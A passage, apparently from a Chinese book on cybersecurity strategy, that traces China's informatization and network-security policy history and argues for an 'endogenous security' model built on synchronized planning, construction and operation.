2006年,中共中央办公厅、国务院办公厅印发《2006——2020年国家信息化发展战略》。这是中国信息化发展史上第一次制定的中长期战略性发展规划。规划提出,坚持以信息化带动工业化,以工业化促进信息化,坚持以改革开放和科技创新为动力,大力推进信息化,充分发挥信息化在促进经济、政治、文化、社会和军事等领域发展的重要作用,不断提高国家信息化水平。 ● 第四阶段:数字化阶段 也有人称该阶段为“互联网+”阶段。2015年,国务院印发《关于积极推进“互联网+”行动的指导意见》,“互联网+”成为我国经济社会创新发展的重要驱动力量。“互联网+”是两化(信息化和工业化)融合的升级版,将互联网作为当前信息化发展的核心特征提取出来,并与工业、商业、金融业等服务业全面融合。 2016年,中共中央、国务院印发《国家创新驱动发展战略纲要》,强调把数字化、网络化、智能化、绿色化作为提升产业竞争力的技术基点。之后国家相继发布了一系列政策措施,国务院印发《“十三五”国家信息化规划》,围绕建设数字中国,明确了17项发展指标,部署了10项重大任务、16项重点工程;2017年,党的十九大报告中明确提出:要建设网络强国、数字中国、智慧社会,推动互联网、大数据、人工智能和实体经济深度融合;2019年3月,“智能+”首次被写入政府工作报告。报告中提出:打造工业互联网平台,拓展“智能+”,为制造业转型升级赋能。 在这些政策推动下,我国的信息化进入了一个数字化、智能化的新阶段,充分利用大数据、人工智能等新技术,推进决策支持的知识化,依靠数据提高生产力,这也是数据成为生产要素的先决条件。 下面列举了2006年以来(第三阶段和第四阶段),我国在信息化发展历程中的一些重大政策驱动事件。 ● 2006年5月,中共中央办公厅、国务院办公厅印发《2006——2020年国家信息化发展战略》,是我国信息化发展史上第一次制定的中长期战略性发展规划。 ● 2012年6月,国务院印发《国务院关于大力推进信息化发展和切实保障信息安全的若干意见》(国发〔2012〕23号),确定了“宽带中国”工程;信息化和工业化深度融合;要“建立健全信息安全保障体系”等6项重点工作。 ● 2012年7月,国务院印发《“十二五”国家战略性新兴产业发展规划》,确定新一代信息技术产业为重点发展方向和主要任务之一。 ● 2013年8月,国务院印发《“宽带中国”战略及实施方案》,到2020年,我国宽带网络基础设施发展水平与发达国家之间的差距大幅缩小。 ● 2015年5月,国务院印发《中国制造2025》,明确指出以信息化与工业化深度融合为主线,重点发展十大领域。 ● 2015年7月,国务院印发《关于积极推进“互联网+”行动的指导意见》“互联网+”成为我国经济社会创新发展的重要驱动力量。 ● 2016年1月,国务院印发《“十三五”国家科技创新规划》,将智能制造和机器人列为“科技创新2030项目”重大工程之一。 ● 2016年5月,中共中央、国务院印发《国家创新驱动发展战略纲要》,强调把数字化、网络化、智能化、绿色化作为提升产业竞争力的技术基点。 ● 2016年7月,中共中央办公厅、国务院办公厅印发《国家信息化发展战略纲要》,强调加快建设数字中国、大力发展信息经济是信息化工作的重中之重。 ● 2016年12月,国务院印发《“十三五”国家信息化规划》,围绕建设数字中国,明确了17项发展指标,部署了10项重大任务、16项重点工程。 ● 2017年3月,“数字经济”首次被写入政府工作报告,要推动“互联网”深入发展、促进数字经济加快成长,数字经济成为国家发展战略的重要一环。 ● 2017年10月,党的十九大报告中明确提出,要建设网络强国、数字中国、智慧社会,推动互联网、大数据、人工智能和实体经济深度融合。 ● 2018年9月,国家发改委、教育部等19部门联合印发《关于发展数字经济稳定并扩大就业的指导意见》,提出以大力发展数字经济促进就业为主线,加快形成适应数字经济发展的就业政策体系。 ● 2019年3月,“智能+”首次被写入政府工作报告。该报告指出:打造工业互联网平台,拓展“智能+”,为制造业转型升级赋能。 1.1.2 政企机构信息化发展的4个阶段 在政策与信息技术发展的双重驱动之下,政企机构结合自身的发展特点,一般也会先后经历多个不同的发展阶段。行业内普遍比较认同《企业信息技术总体规划方法》(石油工业出版社,2012年)一书中对政企机构的信息化建设阶段的划分。该书将政企机构的信息化建设阶段由低到高分为4个阶段:分散建设阶段、统一建设阶段、集成应用阶段和共享应用阶段。 以这一划分为基础,我们对这4个阶段的基本概念和含义进行了如下诠释和分析。 ● 分散建设阶段:也可以称为离散式建设阶段,其主要特征是各自为战,单独建设。企业不同的部门按照某项业务或管理功能需求,分别或者分散建设支持该需求的信息化系统,比如财务系统、人事系统、供销系统等。 ● 统一建设阶段:也可以称为集中建设阶段,其主要特征是企业按照企业发展战略,对信息系统进行统一的、全局性的、体系化的规划建设,并对信息系统的实施、管理和运营制定相关制度。 ● 集成应用阶段:也可以称为业务支撑阶段,其主要特征是信息化开始成为企业发展战略的重要组成部分。信息系统与业务系统深入融合,全面支撑企业业务运营和业务发展,信息系统的价值得到了企业业务部门的全面认同。 ● 共享应用阶段:也可以称为业务一体化阶段,其主要特征是信息化与业务真正实现一体化,相互依存,相互推动,信息化成为业务发展和转型升级的重要组成部分。在此阶段,信息和数据逐渐发展为企业的生产要素,所以在这个阶段对信息系统的安全性和可靠性提出了更高的要求。 从全球来看,国际领先的企业大多在1995年后进入了信息化建设的第二阶段,2000年后进入第三阶段,其信息化规划和建设上升到了企业战略高度。当政企机构的信息化建设达到第四阶段时,业务与信息化系统已经变得密不可分。 1.1.3 EA方法在信息化发展中的指导作用 2000年后,我国的信息化发展逐步走向了规模化和体系化。零散的、“摸着石头过河”式的建设方法已经完全无法适应企业的信息化发展需求。越来越多的政企机构,特别是许多行业领先的企业,开始采用企业架构(Enterprise Architecture)方法,简称EA方法(或EA方法论),来指导自身的信息化系统规划和建设,以体系化构建企业所需要的信息化(组织)能力。其中国内比较知名的成功案例包括: ● 华为公司,从2002年开始以EA方法来牵引企业的IT业务需求; ● 中国建设银行,从2004年开始进行企业架构的设计工作; ● 中国工商银行,从2006年开始设立企业架构设计队伍。 EA方法的采用在上述企业的信息化发展历程中,起到了至关重要的作用,为其实现行业领跑地位奠定了重要的技术基础。IDC在2010年发布了一份《2010企业架构中国管理者调查报告》,报告显示“企业架构的初期普及实施已经开始。超过73%的大型、超大型企业已经开始或完成构建企业架构,相当数量的大型企业已经意识到企业架构对企业业务及战略的支撑能力,并以此作为企业实现未来竞争力的关键”。 EA方法强调,要站在全局的、整体的、系统的高度,根据企业发展战略,设计信息化的总体架构体系来制定和实施信息化规划。EA方法为企业科学、规范、全面地进行信息化规划建设提供了参考方法,对全球政企机构的信息化发展起到了巨大的推动作用,引导规划建设了大量体系化的、高效整合的业务运营体系,为企业的业务运营起到了很好的支撑作用。 1.2 网络安全的发展历程 作为信息化的基础保障,信息安全和网络安全伴随着信息化的发展而不断发展变化。过去二十多年间,我国的信息安全和网络安全的发展,主要是由合规导向和事件驱动相互交织,在这个过程中呈现出了明显的零散化发展特征。 1.2.1 合规导向和事件驱动交织 1994年是我国信息安全领域的一个转折点。1994年2月18日,国务院发布了《中华人民共和国计算机信息系统安全保护条例》,该条例规定了计算机信息系统安全保护的主管机关、安全保护制度、安全监管等。从1994年起,我国信息安全法律法规体系进入了初步建设阶段,一大批相关法律法规先后出台,包括《计算机信息网络国际联网安全保护管理办法》《金融机构计算机信息系统安全保护工作暂行规定》等。从这个时期开始,信息安全建设开始进入合规遵从阶段。 1998年,随着互联网开始普及,爆发了著名的CIH病毒,该病毒在2个月时间内蔓延全球,超过6000万台电脑受到了不同程度的破坏。进入1999年,国家、行业甚至是企业开始严密防范“千年虫”,并耗费了大量资金来解决千年虫问题。 信息安全问题由此受到高度重视。2000年10月,十五届五中全会通过的《中共中央关于制定国民经济和社会发展第十个五年计划的建议》中明确提出“强化信息网络的安全保障体系”。国务院专门成立了“国家信息化工作领导小组”,负责组织协调国家计算机网络与信息安全管理方面的重大问题。同时,国家加强了信息安全基础设施的建设,成立了“国家计算机网络与信息安全管理中心”,以加强对公共信息网络中信息内容的管理,要求加强“中国信息安全测评认证中心”的建设,以便尽早建立起国家的信息安全测评认证体系。 2003年,中央办公厅、国务院办公厅颁发《国家信息化领导小组关于加强信息安全保障工作的意见》(中办发〔2003〕27号)(以下简称27号文件)。27号文件明确指出“实行信息安全等级保护”,这也标志着我国信息安全法律体系的建设进入一个更高的阶段。 27号文件的颁发是中国信息安全工作的一个分水岭。《计算机世界》报2005年的文章中援引信息安全业内人士的话称,“27号文件具有奠基意义:其一,这是我们国家首次对信息安全有了一个全面认识,从整体上,从顶层统筹考虑信息安全的政策、方针、规划,以统筹领导信息安全的各个部门,而在这以前工作是比较零散的;其二,在27号文件颁发后的两年,信息安全相关工作有了大的推进,信息安全等级保护、风险评估、密码保护、网络信任体系、应急响应与灾难备份、产品管理、产业发展等基础性工作的相关政策、标准正在制定并将陆续出台”。 2004年至2006年,公安部联合四部委开展涉及65117家单位,共115319个信息系统的等级保护基础调查和等级保护试点工作,为全面开展等级保护工作奠定基础。 2004年,公安部等四部门印发了《关于信息安全等级保护工作的实施意见》。2007年至2012年,围绕信息安全等级保护工作的管理办法和相关标准陆续发布,信息安全建设全面进入等级保护阶段。 2013年,国外一家安全公司发布了全球第一份APT(Advanced Persistent Threat,高级持续性威胁)研究报告;同年,轰动全世界的“斯诺登事件”爆发。这两起标志性的事件,使得具有政府背景的高级威胁和高级威胁组织成为全球安全关注焦点。当年CNCERT/CC(国家互联网应急中心)公布的数据显示,我国境内至少4.1万余台主机感染具有APT特征的木马程序,涉及大量政府部门、重要信息系统以及高新技术企事业单位,木马控制服务器绝大多数位于境外。 2014年,中央网络安全和信息化领导小组成立(于2018年改为中国共产党中央网络安全和信息化委员会),标志着网络安全正式上升至国家战略层面。2016年,《中华人民共和国网络安全法》和《国家网络空间安全战略》陆续发布,特别是2016年习近平总书记的“4·19”讲话,表明网络安全在国家发展战略中的地位越来越明确和突出。2018年在全国网络安全和信息化工作会议上,习近平总书记发表重要讲话,深入阐述了网络强国战略思想。 2017年5月12日,“永恒之蓝”勒索病毒大规模爆发,全球至少150个国家、30万用户中招,波及金融、能源、医疗等众多行业,造成的损失达80亿美元。这次事件使所有人认识到,网络安全直接关系国家安全、经济安全和社会稳定。 2017年之后,《中华人民共和国密码法》《网络安全等级保护条例(征求意见稿)》《关键信息基础设施安全保护条例(征求意见稿)》《信息安全技术 关键信息基础设施安全检查评估指南》《网络安全审查办法》等配套法律法规陆续出台,我国的网络安全治理体系逐步完善。 1.2.2 网络安全的零散化发展 合规导向和事件驱动的网络安全建设模式、建设过程是为了满足合规的某些指标要求、某项新技术的出现,或者是应对某一单一威胁进行建设。这种发展模式的特点,总结起来就是一种创可贴式的建设模式:网络安全发展没有自己的主线,旁从于信息化发展,对信息化系统进行修补。与体系化发展的信息化相比,安全建设模式大多以“局部整改”为主,缺乏以复杂系统性思维引导的规划与建设实践,致使网络安全体系化缺失、碎片化严重,安全能力相互割裂,缺乏协同联动与整体运行。 合规导向和事件驱动的网络安全建设模式还引发了其他一些安全痼疾。例如:技术上,常常片面依赖边界隔离和特征库匹配;预算支出上,建设重点大多是合规驱动的硬件采购;建设上,重硬件产品轻安全运行,重设备采购轻架构安全的情况非常普遍,缺乏对网络安全工作目标的认知,认为满足合规即可保证安全,形成虚假的安全感,未能起到有效的防护作用。 事实上,除等级保护测评外,在相当长的一段时间内,我们也缺少其他更加有效的手段对安全能力进行评估。这也导致了很多政企机构的信息化负责人都会误以为通过等级保护测评后即可高枕无忧。由于缺少对安全能力或安全建设成熟度的评价体系,安全能力的建设必然会出现缺失,“缺规划、缺经费、缺人手、缺运行”的现象非常普遍。 ● 缺规划:没有规划,安全后置,“创可贴”式的建设导致产品堆砌、防护失衡,手段“碎片化”。 ● 缺经费:网络安全预算相对于IT整体预算占比不足。难以应对“实战化、常态化”挑战,无法达到预期目标。 ● 缺人手:人是网络安全实战化运转的基础。内部安全人员编制不足,外部采购没有名目,人员能力不足。 ● 缺运行:几乎没有运营,IT与安全“两张皮”,资产不清,管理难落地,安全体系无法有效运行。 客观地说,在过去相当长的一段时间内,合规导向和事件驱动的网络安全建设模式也起到了保护信息化正常发展的作用。但随着信息化进一步向数字化升级,这种缺乏顶层设计、工程化考虑不足的模式,已经难以达到保障数字化业务的更高标准,更达不到国家网络空间安全战略的要求,无法以面向对抗的实战化运行模式应对升级的威胁。其结果是,网络安全建设整体处于被动发展模式,安全工作难以落实,网络安全创新能力难以释放,网络安全的零散化发展特点格外明显。 1.2.3 网络安全建设方法论的缺失 处于快速发展中的数字化转型阶段的信息化领域,政企机构采用企业架构(Enterprise Architecture,EA)方法论为引导,在管理层、IT人员和业务人员之间建立充分沟通的桥梁并达成共识,以顶层视角全局思考信息化建设,使信息化与业务紧密结合,各子系统间形成有效联动,消除功能重复建设,引导规划建设大规模、体系化、高效整合的业务运营体系,很好地支撑了业务运营。 与之形成强烈反差的是在网络安全领域,建设者普遍缺乏以复杂系统思维引导的规划与建设实践,导致形成了以往以“局部整改”“辅助配套”为主的安全建设模式,致使网络安全体系化缺失、碎片化严重,网络安全防御能力与数字化业务运行的高标准保障要求严重不匹配。 长期以来,由于政企机构网络安全体系的基础设施完备度不足,安全对信息化环境的覆盖面不全,与信息化各层次结合程度低,安全运行可持续性差,应急能力就绪度低,资源保障长期不充足,导致政企机构在面对“当前数字化业务的平稳、可靠、有序和高效运营是否得到了充足的网络安全保障?”等问题时普遍缺乏信心。 对比国内的网络安全与信息化的发展历程,我们不难发现: ● 从政策驱动来看,网络安全工作与信息化工作几乎是同时起步(1993-1994年),但是发展速度却大相径庭; ● 从重视程度来看,直到最近几年,国家才从战略层面开始高度重视网络安全,网络安全建设被提升到与信息化建设相同的地位,故而提出“一体之两翼,驱动之双轮”; ● 从方法论角度看,信息化建设已经在实践中逐步形成了以EA方法为代表的系统性方法论;而网络安全建设则仍然以合规导向和事件驱动为主,明显缺乏系统化的方法论指导。 图1.1所示为信息化发展历程与网络安全发展历程的对比。 图1.1 信息化发展历程与网络安全发展历程的对比 20世纪80年代到20世纪90年代初,信息化建设和网络安全建设都处于比较原始的状态。对于生产和办公而言,信息化建设是辅助性的,而网络安全建设则几乎普遍缺失,只有当某些极端或严重的安全事件发生时,才有可能触发一些小规模的安全建设。 20世纪末期,IT体系规划方法已经基本成形,EA方法、服务管理和运维管理等理论体系和实践都已经初步形成;而网络安全建设开始进入以合规需求为主导的时期,总体表现为零散的、局部的、创可贴式的(哪里出了问题补哪里)建设。合规需求主导的网络安全建设一直持续到21世纪的前10年。 2000年以后,IT建设或者信息化建设已经逐渐演变成为支撑业务的基础服务,对业务的影响持续加剧;2015年以后,越来越多的政企机构开始将核心业务运行在信息化系统之上,数字化转型持续加速。国家层面,以数字化为基础的 “新基建”建设也开始全面推进。体系化的方法论为信息化建设的持续深入奠定了理论基础和方向指引。 与信息化发展相比,网络安全建设的发展阶段相对滞后。直到2010年以后安全能力建设才被逐步认可,可运行的、可与信息化结合的网络安全建设模式开始受到重视。2018-2020年,以“内生安全”为代表的体系化的、主动的、以三同步为原则(信息化系统应当与网络安全系统同步规划、同步建设、同步运营)的安全建设思想及方法论才逐步形成体系。 总体对比中国的信息化发展历程与网络安全发展历程不难看出,缺少科学的、系统性的方法论,是网络安全建设始终显著落后于信息化建设的重要原因之一。而内生安全思想正是破解这一发展困境的关键。 1.3 国家网络安全战略的新要求 国家网络安全战略要求我们建设更强大的、体系化的网络安全防线。 2014年,中央网络安全和信息化领导小组第一次会议召开时,习近平总书记强调,网络安全和信息化是一体之两翼、驱动之双轮,必须统一谋划、统一部署、统一推进、统一实施。做好网络安全和信息化工作,要处理好安全和发展的关系,做到协调一致、齐头并进,以安全保发展、以发展促安全,努力建久安之势、成长治之业。上述要求指明了网络安全与信息化相互依存、同步发展的大方向,明确了“四个统一”缺一不可的体系化建设要求。 2016年,在“4·19网络安全和信息化工作座谈会”上,习近平总书记提出“安全是发展的前提,发展是安全的保障,安全和发展要同步推进。要树立正确的网络安全观,加快构建关键信息基础设施安全保障体系,全天候全方位感知网络安全态势,增强网络安全防御能力和威慑能力”的要求。 随着全球经济全面进入数字化转型期,我国也提出了“数字中国”“网络强国”等一系列与数字化转型紧密相关的战略部署,将数字化转型作为重要发展战略与经济驱动力。数字化转型是在信息化极大地降低了政企机构运行成本的基础上,进一步将信息技术与政企机构业务运行、管理流程融合在一起,形成新的业务运行模式。 2020年3月,中共中央政治局常务委员会召开会议提出,要加快5G网络、数据中心等新型基础设施的建设进度。与传统基建相比,“新基建”内涵更加丰富,涵盖范围更广,更能体现数字经济特征,有助于加速推动中国经济转型升级。 在数字化转型为政企机构的业务运行带来巨大收益的同时,信息技术与业务的深度融合也使网络安全风险更具有实质性的意义。网络安全问题对业务更加具有破坏性乃至灾难性。从某种角度看,网络安全风险将会等效于业务运行风险;同时数字化技术的应用也会为业务运行引入更多新的风险。政企机构信息系统一旦被入侵或被破坏,将会直接危害到业务运行,进而危害到生产安全、社会安全甚至国家安全。 数字化转型对政企机构运行模式的转变是颠覆性的、不可逆转的,传统的信息化模式也将无法满足目前经济环境下的业务运行要求。因此,政企机构必须立足于有效保障数字化业务运行的安全、高效、可靠运行,建设具有动态、综合、可持续等特点的数字化业务安全保障体系。 “十四五”是数字化转型的关键阶段,网络安全模式亟需转变。广大政企机构需把握住“十四五”的契机,践行安全与信息化同步规划、同步建设、同步运行思想,通过安全规划承接国家网络安全战略,建立从顶层设计、部署实施到安全运行的一整套网络安全新模式,使网络安全向面向对抗的实战化运行模式升级。 1.4 数字化时代的安全新挑战 数字化是信息化发展的高级形态,主要表现为多种新型数字化技术对生产方式的深刻改变以及与传统领域的业务融合。国内著名产业研究机构“前瞻产业研究院”的一份报告中称:从2018年开始,中国企业数字化转型加速,政企加速云化进程,大数据应用于企业管理经营决策。 如果说网络安全建设在过去20年的滞后发展,使得信息化建设的快速发展没有得到充分的保护,那么在数字化时代,系统性的网络安全建设方法的缺失,将为生产、生活、经济发展、社会稳定乃至国家安全带来深远的影响和致命的伤害。 1.4.1 数字化时代的产业新形态 IT在经历了大型机、小型机、PC、互联网等持续的技术变革后,已经进入以云计算、大数据和人工智能为核心的新一轮技术创新周期。近十年,伴随着移动互联网、大数据、云计算、物联网、人工智能等新兴技术的发展,政企信息化也开始向数字化、网络化、智能化方向发展。 特别是云计算技术的成熟,推动了IT基础架构的巨大变迁,将传统独立垂直的硬件设施资源虚拟化为融合共享的云基础设施,分时复用、按需付费的模式降低了系统部署门槛的同时,也打破了传统系统的独立的烟囱式架构,实现了当前“数据融合共享、应用协同交互”平台型架构的重塑。 新技术的应用,使行业的生产经营发生了颠覆性的重构,大量复杂的、非结构化的数据得以利用。大范围的数据获取结合人工智能技术的处理能力,使管理决策向半自动化、自动化方向发展。从某种程度上看,数据本身是数字化系统最重要的生产输出,它们不仅可以用于生产的监控与管理,同时其本身也具有巨大价值。数据本身是重要的机构资产。 1.4.2 数字化时代的安全新威胁 与数字化转型和数字经济的发展相伴的,是网络安全威胁形势的重大变化。其中,攻防对抗过程的变化直接导致了传统安全思想和防御体系的全面失效,具体表现在以下几个方面。 ● 战场的变化,从网络与系统演变到 “云、大、物、移、工” 新技术的应用也会带来新的安全风险。例如:IT基础设施和业务系统向云的迁移,必然导致安全风险向云端集中;IoT设备接入生产、办公系统,必然形成新的不可控的安全缺口;大数据的汇聚带来了高效的信息交互,但同时也增加了数据泄露和数据被篡改、破坏的风险。 仅就政企机构而言,传统的网络安全攻防战场通常是本地的网络或系统。但新型数字化技术的普及应用,使云服务系统、大数据系统、工业生产系统等成为新的攻防主战场。同时,安全防护相对较弱的IoT设备、移动终端,也往往会成为攻击者入侵机构内部网络的新突破口。 不仅如此,在很多实际系统中,不同类型的网络设备或系统、不同用途的数字化技术,往往是相互交织、结合使用的。如果我们总是孤立地去解决一个一个的具体问题,或者是简单地使用某些单一的、片面的技术方法,则无法真正有效地解决“新战场”上的安全问题。 ● 对手的变化,从普通网络犯罪演变到组织与国家级对抗 最早期的网络攻击者大多数是没有明确攻击目标的技术爱好者;2000年以后,以牟利为目标的个体攻击者开始大量涌现;再后来,有组织的黑产团伙、有主张的黑客团伙和有国家背景的攻击组织开始活跃,逐渐成为与政企机构网络安全工作对抗的主要“对手”。 对手的升级变化,使我们正在面临越来越多的未知威胁,对越来越多的攻击根本无法进行完全有效的防御。也就是说,任何边界上的防御体系一定会被打穿,任何已知的系统都可以被渗透。这就要求我们必须认真地考虑“系统被打穿以后会怎么样”,以及“系统被打穿以后该怎么办”的问题。 ● 武器与战术的变化,勒索蠕虫、APT和供应链攻击成为主要威胁 勒索病毒的出现不过是最近几年的事情,却颠覆了人们的传统安全认知。早期的勒索病毒主要是针对高价值人群发动定点攻击。但2017年以后,以关键信息基础设施、网络服务器为目标的勒索攻击逐渐成为主流,并且出现了大量可以自动传播的勒索蠕虫病毒。2018年以来,勒索病毒几乎成为导致政企机构停产停工的首要网络安全威胁。 APT攻击被普遍认为是理论上无法完全有效防御的攻击。一方面,政府支持的APT活动正在持续增加,这些攻击者往往拥有大量的资源、工具和技术,使得APT溯源难度显著提升;另一方面,由于APT组织的网络武器库频繁泄露,使无政府背景的攻击者更容易获取资源,从而实施难以被发现的、新的、复杂的APT攻击。 供应链攻击则是一种有效的、另辟蹊径的攻击策略。当攻击者遇到难以直接攻破的组织或系统时,就会考虑发起供应链攻击,即对该组织的供应商发起攻击,或对供应商的供应商发起攻击,最终实现对攻击目标的渗透。例如,将恶意软件植入合法软件包,在企业采购的设备芯片中设置“后门”等。供应链攻击在高级威胁中比较常见,某些黑产团伙也会使用。 在数字化时代,勒索病毒、APT攻击、供应链攻击等新型威胁的危害被进一步放大。使用传统的方法对“固有地盘”严防死守,并不能有效地防御这些新威胁。 ● 打击目标的变化,从瞄准网络与系统演变到瞄准数据和业务应用 生产和业务系统的数字化也为攻击者提供了新的“价值空间”。仅就国内情况而言,在以往相当长的一段时间内,政企机构并不是网络攻击的首选目标。毕竟,攻击普通网民或消费者更加容易,也获益更快。即使是针对机构系统的拖库、撞库等攻击,最终目的也仍然是针对普通网民的“盗窃”或“诈骗”。所以,机构只要进行必要的网络与系统防护,一般不会受到严重威胁。 但是,随着业务系统数字化转型的深入,数据和业务应用逐渐成为攻击者的首选目标。这一方面是因为安全防护的不足使得数据和业务系统的暴露面增大,攻击门槛大大降低;另一方面则是因为一旦攻击成功,攻击者就有可能获得“超额回报”。 以勒索攻击为例,如果勒索病毒只能攻击几台办公电脑,攻击者可能无法获得任何收益;但如果攻击机构的服务器,破坏机构的核心数据或核心业务系统,攻击者获得赎金的可能性要比勒索高价值的个人大得多。这也是近年来勒索病毒将服务器作为主要攻击目标的根本原因。 可以预见,随着新技术应用的深入、国家对抗的持续、网络犯罪组织化的升级,网络安全威胁将越发呈现出多样化和未知性;新的攻击组织、新的攻击技术、新的攻击手法将层出不穷;外部威胁和内部威胁相互交织,商业利益诉求和恐怖破坏目的相互交织;以APT为代表的组织化的定向攻击将常态化,而传统模式的安全思维将受到越来越严峻的挑战。 1.5 信息化保障呼唤内生安全 攻防战场的变化,要求我们必须在新的技术环境下重构安全建设体系;对手的变化、武器与战术的变化,要求我们必须以“系统一定会被打穿”为安全建设的前提假设。而打击目标的变化,要求我们必须把数据和业务的安全保障作为安全建设的首要目标。面对新的信息化环境和威胁形势,围墙式的、外挂式的安全已不可持续,信息化环境的保障需要“内生安全”。 1.5.1 围墙式安全 早期的网络安全建设思想大都是围墙式的。自20世纪80年代全球首个杀毒软件诞生,一直到本世纪初的十几年间,围墙式安全一直是网络安全建设的主导思想。 简单地说,就是使用一套软件或硬件系统,把要保护的区域与外界的网络环境隔离开来,就好像是在信息化系统的外面建造了一座高高的围墙。早期的安全软件、防火墙、入侵检测等设备大都是这种围墙式安全思想的产物。 围墙式安全思想也曾经发挥过非常积极的作用,但在数字化的生产环境中,在新的安全威胁形势下,却暴露出以下3个明显的弊端: ● 围墙之内不设防,一旦边界被突破,系统就会完全沦陷; ● 样本库、规则库等往往缺乏有效维护,更新缓慢,所谓的围墙形同虚设; ● 不同的防护设备和系统之间相互孤立,无法形成合力。 这也是为什么很多政企机构虽然购买了大量软硬件防护设备,但还是会频频被攻陷的原因所在。 1.5.2 数据驱动安全 2015年以后,业务系统的安全问题开始得到越来越多的重视,围墙式安全的脆弱性日益明显。人们开始考虑在内部业务系统的IT环境中部署更多的安全措施,并且将各种安全措施与云端相连(即安全上云),并通过外部(来自安全公司)安全大数据与内部(来自各类安全措施)安全大数据的结合,提升整体安全防护能力。 这种新的安全建设理念,已经不再追求100%的有效防御,而是把安全建设的重心转移到安全监测与威胁发现上。从技术角度看,数据是网络安全的基础,行为是风险监测的关键;所有基础的安全产品都不再仅仅是以隔离和防护为目标,而是兼具安全监测和数据采集的作用。这种以数据为核心的新安全理念被概括为“数据驱动安全”。 相较于围墙式安全,数据驱动安全理念的进步非常明显。 ● 首先,将安全措施部署在业务系统的IT环境中,使得安全防御不再只是网络边界处一层薄薄的外壳,而是有了一定的防御纵深。也正是从这一时期开始,安全工作者开始对纵深防御理论展开了持续的、深入的迭代研究。 ● 其次,与云端相连之后,所有的防护措施都变得更加智能,智慧安全的概念开始流行。特别是威胁情报技术的引入,使安全公司可以将自身强大的威胁感知能力赋能给服务的政企机构,从而使被服务机构的安全能力成倍提升。 ● 最后,当越来越多的安全措施与云端相连后,协同联动的防御体系成为可能。以安全软硬件为节点、以云端安全能力为支撑、以人为核心的安全运营体系逐步形成。EDR(终端检测与响应)技术、NDR(网络检测与响应)技术、NGSOC(新一代安全运营平台)、态势感知等基于大数据的安全产品与服务日渐普及,并极大地推动了政企机构整体安全能力的提升。 不过,数据驱动安全的早期实践还有一些明显的不足,其主要问题在于仍然没有能够从根本上解决业务或生产系统的安全问题,主要原因有以下几个方面。 ● 首先,在绝大多数情况下,在这一阶段的安全建设中,网络安全与业务本身仍然是互相分离的。虽然很多安全措施部署在业务系统的IT环境中,但绝大多数安全措施及解决方案并不是为业务系统量身设计的,仍然是以传统IT安全为目标的各种技术手段的组合。 ● 其次,由于未能将业务大数据与安全大数据进行融合分析,因此无论是来自内部的安全大数据还是外部的威胁情报,其实际作用都会大打折扣。因为如果脱离了具体业务环境,很多针对业务系统的安全威胁根本不成立,也无法被发现。 ● 最后,绝大多数的大型政企机构都不会将安全数据和业务环境向安全公司上报。这就使得安全公司不太可能仅仅通过云端安全大数据,就能构筑起业务级的威胁情报和安全分析能力,因此很难解决政企机构的真实痛点。 不过,客观来说,“数据驱动安全”理念的实践为“内生安全”思想的提出奠定了重要的基础。同时,“数据驱动安全”理念本身也是“内生安全”思想的重要组成部分。只不过在后来的“内生安全”思想体系中,驱动安全的“数据”范畴被大大扩展,从单纯的安全大数据扩展到业务大数据,最终实现了外部安全大数据、内部安全大数据与业务大数据的深度融合与统一。 1.5.3 内生安全的提出 围墙式安全的局限性,致使其在数字化环境中不可避免地遭遇重重挑战。政企机构的信息化建设,需要一种全新的安全思维。我们需要的并不只是一层比一层更加坚固的防护罩,而是一种本身能够与信息化环境相融合的安全能力,做到与信息化环境的深度融合与全面覆盖,从而构建本身就具有内在“免疫力”和“抵抗力”的新型信息化环境。 这就要求我们必须以信息化的视角、业务的视角和全局的视角,来重新构筑整个网络安全防护体系;要求我们必须将网络安全的元素融入到信息化建设的方方面面;要求我们必须在信息化建设中,全面落实“三同步”原则,即信息化系统应当与网络安全系统同步规划、同步建设、同步运营。 内生安全正是在上述认知基础上建立起来的全新的网络安全建设思想。2019年召开的北京网络安全大会以“聚合应变,内生安全”为主题。此后,内生安全的思想得到了广泛传播,并快速地得到了业界的普遍认同。以该思想为指导的“新一代网络安全框架”,及该框架下的“十大工程、五大任务”,已经成为指导大中型政企机构网络安全规划建设的重要参考。 需要说明的是,内生安全思想并不是对围墙式安全的彻底否定,而是为原有的建设“盲区”提供了新的有效的“解题思路”。但是,内生安全体系的建设仍然需要坚实的“围墙”。 第2部分 什么是内生安全 第2章 内生安全的内涵与特性 第3章 内生安全建设的方法论基础 第4章 新一代网络安全框架 第2章 内生安全的内涵与特性 2.1 内生安全的理念 内生安全,就是在信息化环境内不断衍生出安全能力,即使网络的边界防御被打穿,系统仍然能够在一定程度上保持健康运行,并保证数据和业务安全。 内生安全是一种全新的网络安全建设思想。与内生安全相对的概念是外生安全。绝大多数的传统安全防护方法都属于外生安全。具体来说,就是当用户需要保护一个系统时,就在该系统的外面设置一层防护罩,将系统与外界环境隔离开来。小到一款杀毒软件,大到整个机构的边界防御,其实质都是在隔离的基础上进行防护。围墙式安全和外挂式安全都是外生安全的不同表现形式。 内生安全的根本目标是保障业务和业务系统的安全,而不是单纯地保障IT系统和IT设备的安全。所以,内生安全要求在信息化环境内部建设安全能力,使生产系统、业务系统自身具有一定的免疫力,而不是完全依赖于系统之外的隔离和防护。 内生安全落地实现的保障机制是“三同步”原则,即信息化系统与网络安全系统必须同步规划、同步建设、同步运营。只有把网络安全工作贯穿到信息化系统的规划、建设、运营的整个生命周期,将信息化建设与运维工作相结合,将网络安全的防护与响应过程相结合,达到工作任务事项级别的深度绑定,才能够真正实现具有免疫力的内生安全系统。 1.同步规划 同步规划,是内生安全的关键与起点,强调关口前移与预算保障。具体指在信息化系统的设计规划中,充分考虑网络安全,确保网络安全成为信息化系统的有机组成。首先通过与信息化同步规划安全体系,落实“关口前移”,实现安全与信息化的深度结合和全面覆盖。然后通过规划来解决各层级、各业务口对网络安全的理解不一致。 2.同步建设 同步建设是内生安全的落地和保障,强调在信息化建设的方方面面充分考虑引入并融合安全能力。既要积极建设网络安全基础设施,又要开展信息系统内建安全机制的建设。安全能力建设需要基于“叠加演进”的原则,既要积极建设网络安全基础设施,又要建设信息系统内在安全机制。 3.同步运营 同步运营,是内生安全的生命,通过规划、建设形成的安全能力需要具备运营、技术、人和管理规范,才能形成一个完整体系,将安全能力有效输出。而且IT运营中所有与网络安全相关的环节都要与网络安全工作充分对接,而不仅仅是执行扫描、检查、渗透等零散工作。 2.2 内生安全的特点 内生安全要求信息系统的安全体系具有自我免疫(自适应安全能力)、内外兼修(自主安全能力)、自我进化(自成长安全能力)三大特点。 1.自我免疫(自适应安全能力) 